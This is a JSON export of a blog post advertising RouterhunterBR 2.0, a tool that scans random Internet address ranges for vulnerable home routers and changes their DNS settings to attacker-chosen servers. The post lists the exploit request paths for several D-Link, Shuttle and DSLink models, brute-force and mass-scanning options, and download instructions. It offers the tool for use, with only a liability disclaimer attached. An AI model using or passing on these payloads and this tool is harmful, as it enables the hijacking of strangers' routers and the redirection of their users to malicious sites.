{"id":2733,"date":"2016-02-03T02:18:58","date_gmt":"2016-02-03T02:18:58","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2733"},"modified":"2016-02-03T02:18:58","modified_gmt":"2016-02-03T02:18:58","slug":"routerhunter-2-0-a-tool-used-to-find-vulnerable-routers-and-devices-on-the-internet-and-perform-tests","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2733","title":{"rendered":"Routerhunter 2.0 &#8211; A tool used to find vulnerable routers and devices on the Internet and perform tests"},"content":{"rendered":"<p>The <strong>RouterhunterBR<\/strong> is an automated security tool que finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. The<b>RouterhunterBR<\/b> was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability <b>DNSChanger<\/b>on home routers.<br \/>\n<span id=\"result_box\" lang=\"en\"><span class=\"hps\">The<\/span> <b><span class=\"hps\">DNSChanger<\/span><\/b> <span class=\"hps\">is a trojan<\/span> <span class=\"hps\">able to direct<\/span> <span class=\"hps\">user requests<\/span> <span class=\"hps\">to<\/span> <span class=\"hps\">illegal<\/span> <span class=\"hps\">sites.<\/span> <span class=\"hps\">In practice<\/span>, this <span class=\"hps\">malware has the<\/span> <span class=\"hps\">ability to change<\/span> <span class=\"hps\">the DNS settings<\/span> <span class=\"hps\">of our machine<\/span><span class=\"hps\">redirecting<\/span> <span class=\"hps\">the user to<\/span> <span class=\"hps\">sites<\/span> <span class=\"hps\">with<\/span> <span class=\"hps\">malicious purposes<\/span>. <span class=\"hps\">Imagine<\/span> <span class=\"hps\">for example<\/span> <span class=\"hps\">that your system<\/span> <span class=\"hps\">is infected with<\/span> <span class=\"hps\">this malware<\/span>, <span class=\"hps\">what might<\/span> <span class=\"hps\">happen is that the<\/span> <span class=\"hps\">user<\/span> <span class=\"hps\">to<\/span><span class=\"hps\">access a particular<\/span> <span class=\"hps\">site<\/span> <span class=\"hps\">(eg<\/span>. <span class=\"hps\"><span class=\"skimlinks-unlinked\">Facebook.com<\/span><\/span>) <span class=\"hps\">may be<\/span> <span class=\"hps\">forwarded to<\/span> <span class=\"hps\">an unsolicited<\/span><span class=\"hps\">website and<\/span> <span class=\"hps\">potentially<\/span> <span class=\"hps\">illegal.<\/span><\/span><\/p>\n<pre class=\"\">           _           _           _                \n  ___ ___ _ _| |_ ___ ___| |_ _ _ ___| |_ ___ ___ \n |  _| . | | |  _| -_|  _|   | | |   |  _| -_|  _|\n |_| |___|___|_| |___|_| |_|_|___|_|_|_| |___|_|\n                       BR - v2.0\n Tool used to find vulnerable routers and devices on the Internet and perform tests.\n[ Coded by Jhonathan Davi a.k.a jh00nbr - jhoonbr at protonmail.ch ]\n[ fb.com\/JhonVipNet - twitter.com\/jh00nbr - github.com\/jh00nbr\/ - blog.inurl.com.br - www.youtube.com\/c\/Mrsinisterboy ]\n[!] legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual \nconsent is illegal. It is the end user's responsibility to obey all applicable local, state and \nfederal laws.Developers assume no liability and are not responsible for any misuse or damage caused\nby this program.  \n<\/pre>\n<p><strong>GET&#8217;s:<\/strong><\/p>\n<pre>\/dnscfg.cgi?dnsPrimary=8.8.8.8&amp;dnsSecondary=8.8.4.4&amp;dnsDynamic=0&amp;dnsRefresh=1\u2033\n\/dnscfg.cgi?dnsSecondary=8.8.8.8&amp;dnsIfcsList=&amp;dnsRefresh=1\u2033\n\/dnscfg.cgi?dnsPrimary=8.8.8.8&amp;dnsSecondary=8.8.4.4&amp;dnsDynamic=0&amp;dnsRefresh=1&amp;dnsIfcsList=\u201d\n\/dnscfg.cgi?dnsSecondary=8.8.4.4&amp;dnsDynamic=0&amp;dnsRefresh=1\u2033\n\/dns_1?Enable_DNSFollowing=1&amp;dnsPrimary=8.8.8.8&amp;dnsSecondary=8.8.4.4\n\/ddnsmngr.cmd?action=apply&amp;service=0&amp;enbl=0&amp;dnsPrimary=8.8.8.8&amp;dnsSecondary=8.8.4.4&amp;dnsDynamic=0&amp;dnsRefresh=1&amp;dns6Type=DHCP\u201d\n<\/pre>\n<p><strong>Installation:<\/strong><\/p>\n<pre>git clone https:\/\/github.com\/jh00nbr\/Routerhunter-2.0.git\n<\/pre>\n<p><strong>Usage:<\/strong><\/p>\n<pre>\n-range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP\n  -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.\n  -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard \/ 201.*.*.*\n  -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard \/ 201.*.*.*\n  -dns1 8.8.8.8, --dns1 8.8.8.8                    Define malicious dns1\n  -dns2 8.8.4.4, --dns2 8.8.4.4                    Define malicious dns2\n  --threads 10                                     Set threads numbers\n  -rip, --randomip                                 Randomizing ips routers\n  -lmtip 10, --limitip 10                          Define limite random ip\n<\/pre>\n<p><strong>Commads:<\/strong><\/p>\n<pre class=\"\">\u2013range  201.12.50.0-255\nWill set IP range that will be scanned\n\u2013bruteforce\nBrute force with users and passwords on routers that requires authentication, forcing alteration of dns.\n \u2013startip \/ \u2013endip\nYou can customize the IP range with a wildcard \/ Example: \u2013startip 201.*.*.* \u2013endip 201.*.*.*\n\u2013dns1 8.8.8.8 \/ \u2013dns2 8.8.4.4\nServer primary and secondary dns malicious, that anger is listening for requests and will perform the redirection of pages\n\u2013threads 10\nSet threads numbers\n\u2013randomip\nRandomizing ips routers\n  \u2013limitip 10\nDefine limite random ip\n<\/pre>\n<p><strong>The script explores four vulnerabilities in routers:<\/strong><\/p>\n<ul>\n<li>Shuttle Tech ADSL Modem-Router 915 WM \/ Unauthenticated Remote DNS Change Exploit<br \/>\nreference: <a href=\"http:\/\/www.exploit-db.com\/exploits\/35995\/\">http:\/\/www.exploit-db.com\/exploits\/35995\/<\/a><\/li>\n<li>D-Link DSL-2740R \/ Unauthenticated Remote DNS Change Exploit<br \/>\nreference: <a href=\"http:\/\/www.exploit-db.com\/exploits\/35917\/\">http:\/\/www.exploit-db.com\/exploits\/35917\/<\/a><\/li>\n<li>D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit<br \/>\nreference: <a href=\"http:\/\/1337day.com\/exploit\/23302\/\">http:\/\/1337day.com\/exploit\/23302\/<\/a><\/li>\n<li>D-Link DSL-2780B DLink_1.01.14 &#8211; Unauthenticated Remote DNS Change<br \/>\nreference: <a href=\"https:\/\/www.exploit-db.com\/exploits\/37237\/\">https:\/\/www.exploit-db.com\/exploits\/37237\/<\/a><\/li>\n<li>D-Link DSL-2730B AU_2.01 &#8211; Authentication Bypass DNS Change<br \/>\nreference: <a href=\"https:\/\/www.exploit-db.com\/exploits\/37240\/\">https:\/\/www.exploit-db.com\/exploits\/37240\/<\/a><\/li>\n<li>D-Link DSL-526B ADSL2+ AU_2.01 &#8211; Unauthenticated Remote DNS Change<br \/>\nreference: <a href=\"https:\/\/www.exploit-db.com\/exploits\/37241\/\">https:\/\/www.exploit-db.com\/exploits\/37241\/<\/a><\/li>\n<li>DSLink 260E &#8211; Authenticated routers &#8211; DNS Changer &#8211; Bruteforce reference: <a href=\"https:\/\/www.youtube.com\/watch?v=tNjy91g2Rak\">https:\/\/www.youtube.com\/watch?v=tNjy91g2Rak<\/a><br \/>\n<a href=\"http:\/\/blog.inurl.com.br\/2015\/03\/dslink-260e-defaut-passwords-dns-change_17.html\">http:\/\/blog.inurl.com.br\/2015\/03\/dslink-260e-defaut-passwords-dns-change_17.html<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<ul>\n<li>AUTOR: Jhonathan Davi A.K.A jh00nbr<\/li>\n<li>EMAIL*: <a href=\"mailto:jhoonbr@protonmail.ch\">jhoonbr@protonmail.ch<\/a><\/li>\n<li>Blog: <a href=\"http:\/\/blog.inurl.com.br\/\">http:\/\/blog.inurl.com.br<\/a><\/li>\n<li>Twitter: <a href=\"https:\/\/twitter.com\/jh00nbr\">https:\/\/twitter.com\/jh00nbr<\/a><\/li>\n<li>Facebook: <a href=\"https:\/\/fb.com\/JhonVipNet\">https:\/\/fb.com\/JhonVipNet<\/a><\/li>\n<li>Fanpage: <a href=\"https:\/\/fb.com\/InurlBrasil\">https:\/\/fb.com\/InurlBrasil<\/a><\/li>\n<li>Github: <a href=\"https:\/\/github.com\/jh00nbr\/\">https:\/\/github.com\/jh00nbr\/<\/a><\/li>\n<li>Youtube: <a href=\"https:\/\/www.youtube.com\/c\/Mrsinisterboy\">https:\/\/www.youtube.com\/c\/Mrsinisterboy<\/a><\/li>\n<\/ul>\n<div><\/div>\n<div style=\"text-align: center;\"><b><a href=\"https:\/\/github.com\/jh00nbr\/Routerhunter-2.0\" target=\"_blank\" rel=\"noopener noreferrer\">Download\u00a0RouterhunterBR 2.0<\/a><\/b><\/div>\n","protected":false},"excerpt":{"rendered":"<p>The RouterhunterBR is an automated security tool que finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. TheRouterhunterBR was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChangeron home routers. The DNSChanger is a trojan able to direct user<\/p>\n","protected":false},"author":1,"featured_media":2734,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[591,154,638,634],"tags":[564,639,566],"class_list":["post-2733","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-exploitation-tools","category-pentesting-tools","category-router-exploitation","category-scanner","tag-dns","tag-routers","tag-vulnerabilities"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2733"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2733\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2733"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2733"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}